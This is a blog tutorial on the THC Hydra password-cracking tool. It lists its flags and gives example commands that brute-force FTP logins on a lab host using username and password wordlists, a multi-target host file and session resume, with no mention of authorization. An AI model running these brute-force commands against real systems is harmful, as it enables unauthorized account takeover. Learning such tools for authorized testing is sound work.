Get in Touch

Hydra full tutorial from scratch | Updated 2024

Introduction

In this post, you will learn what is thc-hydra and how does it work and also you will learn all the commands in the tool.

Below is the video format of the post, Please check it out 👇🏾

Video

What is hydra

THC Hydra stands for “The hackers choice” Hydra.

This a hacking tool, it is a very powerful password cracking tool. I think you may come across the john the ripper tool, even this tool is used for password cracking.

The difference between John the ripper and the hacker choice hydra is John the ripper works offline and The hackers choice hydra (Hydra) works online.

Download thc hydra from here [Click here]

Advertisement

Useful commands in hydra tool

  1. -R: restore a previous aborted/crashed session
  2. -S: perform an SSL connect
  3. -s: PORT if the service is on a different default port, define it here
  4. -l LOGIN or -L: FILE login with LOGIN name, or load several logins from FILE
  5. -p PASS or -P: FILE try password PASS, or load several passwords from FILE
  6. -o FILE : write found login/password pairs to FILE instead of stdout
  7. -4 / -6 : prefer IPv4 (default) or IPv6 addresses

How to crack password using hydra tool

Just follow the below examples and I am very much sure by end of the blog post, You will be familiar with the tool.

Have any doubt comment down below or watch the video I made on thc hydra.

Example1, Using specific username and password

Below is the command for specific username and password

hydra -l msfadmin -p msfadmin 192.168.1.37 ftp

-l: Username

-p: Password

After you enter the username and password enter the target, then specify the service you are atatcking.

hydras

Example2, Using multiple username and password

To use multiple usernames and password list just enter capital -L and -P

hydra -L username.txt -P password.txt 192.168.1.37 ftp -v

-L: List of usernames

-P: List of password

Then enter the service your are attacking and finally I have added the -v (verbose)

hydras

Example3, Using debug mode in hydra

The debug mode gives you more clarification on what is happening.

Advertisement

hydra -L username.txt -P password.txt 192.168.1.37 ftp -v -d

hydras

Example4, Save the result

To save the result you can use the -o command

hydra -L username.txt -P password.txt 192.168.1.37 ftp -o msfadmin.txt

hydra

Example5, Resume attack

To resume an attack, You can just enter -R, Mostly you will resume an attack if it takes a long time to crack the password.

If you wanted to resume an attack make sure that currectly running attacks logs are saved.

Advertisement

hydra -L username.txt -P password.txt 192.168.1.37 ftp

hydra -R

hydra

Example6, Attacking on specific port

To attack on specific port enter the -s command, Instead of entering service you can specify the port and attack.

hydra -L username.txt -P password.txt 192.168.1.37 ftp -s 21

hydra

Example7, Password cracking on multiple target

Using hydra tool you can also perform multiple brute force attacks. And you have to specify the host file after -M command like this

hydra -L username.txt -P password.txt -M host1.txt ftp -s 21

hydra

Conclusion

My final thoughts on hydra is Awesome. My first choice is medusa and then it is hydra. Hydra is the only online password cracking tool which has got colourful interface.

Advertisement

Also Read: John the ripper full tutorial

Also Read: Ncrack password cracking tool

You may also like